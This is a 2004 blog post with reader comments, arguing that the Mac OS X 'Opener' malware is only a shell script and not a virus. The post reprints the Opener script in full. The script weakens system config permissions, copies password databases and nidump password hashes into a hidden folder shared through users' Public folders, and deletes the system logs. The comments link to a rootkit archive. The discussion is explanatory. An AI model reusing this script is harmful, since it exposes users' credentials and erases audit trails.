Subscribe via feed.

opener: fake virus or spyware on OSX

Posted by deepquest on October 26, 2004 – 3:35 pm

I hesitated to post about that subject, but after seing all crapy details posted, relayed by media I decided to provide more details to show that is not a virus, not a spyware just a script targeting dummies and warez downloaders.

Let’s start from the beginning. As you may have noticed already, I’m some kind of dummy when it comes to computers and I tried to find a clear explanation about virus. So I went to [url=http://computer.howstuffworks.com/virus2.htm]How things works[/url], and I’ve found that “A computer virus must piggyback on top of some other program or document in order to get executed. Once it is running, it is then able to infect other programs or documents”.

So here is the evil code for “Opener”

“AVE THIS AS A TEXT FILE CALLED opener
#! /bin/sh
chmod 777 /etc/hostconfig
chflags nouchg /etc/hostconfig
mv /etc/hostconfig /etc/hostconfigold.old
cp /Library/StartupItems/opener/hostconfig /etc/hostconfig
cp -R /Library/ApplePasswordServer /.info/Library/ApplePasswordServer
cp /Library/WebServer/users /.info/Library/WebServer/users
cp /System/Library/CoreServices/SystemVersion.plist /.infoSystem/Library/CoreServices/SystemVersion.plist
cp -R /private/var/db /.info/private/var/db
cd /.info
nidump passwd . > .nidump.txt
nidump passwd / > .nidump2.txt
chmod -R 777 /.info
cd /Users
find . -maxdepth 2 -name “Public” -type d -exec sudo cp -R /.info ‘{}/.info’ \;
rm -Rf /private/var/log/
rm -Rf /Library/Logs/ ”

Haven’t you noticed something? #! /bin/sh ? Does it sound familiar to some of you? If not it #! /bin/sh is an Unix shell scripting language. For windows users, it’s that has the .bat file, dos scripts on Windows. That’s the virus, a unix shell script? It seems like the cream of cream of IT journalists such as [url=mailto:damian@itweb.co.za]Damian Clarkso[/url], [url=http://software.silicon.com/malware/0,3800003100,39125245,00.htm]Munir Kotadia[/url], [url=http://www.eweek.com/article2/0,1759,1682846,00.asp]Ian Betteridge[/url] should spend more time on site such has [url=computer.howstuffworks.com]How computer stuffs works[/url].

Why it’s not a virus?
-It doesn’t self propagate.
-It doesn’t use any exploits such as buffer over flow.
-It doesn’t use any shellcode.
-It does’t infected/destroy any files.
-It doesn’t use any security weakness

please feel free to add more on that list!


This post is under “Apple” and has no respond so far.
If you enjoy this article, make sure you subscribe to my RSS Feed.

No Respond so far- Add one»

  1. 1. mac-geek Said:
    October 28th, 2004 at 1:47 pm

    here’s the real code for opener ( http://freaky.staticusers.net/ugboard/viewtopic.php?t=10712&start=120&sid=d21270b46d24664177238b539b4b4495 ). Virus no, trojan maybe, it does replicate itself.

  2. 2. MAc_geek Said:
    November 1st, 2004 at 3:36 am

    ok how about a rootkit then. If not then it’s definately part of a rootkit at least:

    http://packetstormsecurity.org/UNIX/penetration/rootkits/osxrk-0.2.1.tbz

  3. 3. deepquest Said:
    October 30th, 2004 at 11:45 pm

    not even a trojan, a trojan requieing admin rights isn’t a really one:-)

    Thanks Mac-Geek for point the original source/url.

  4. 4. neil Said:
    November 1st, 2004 at 4:11 am

    Another rootkit for OS X. this one is just a proof of concept.

  5. 5. neil Said:
    November 1st, 2004 at 4:12 am

    oops

    http://neil.slampt.net/

  6. 6. deepquest Said:
    November 3rd, 2004 at 3:28 pm

    finally interesting rootkit 😉

Post a reply

You must be logged in to post a comment.


« »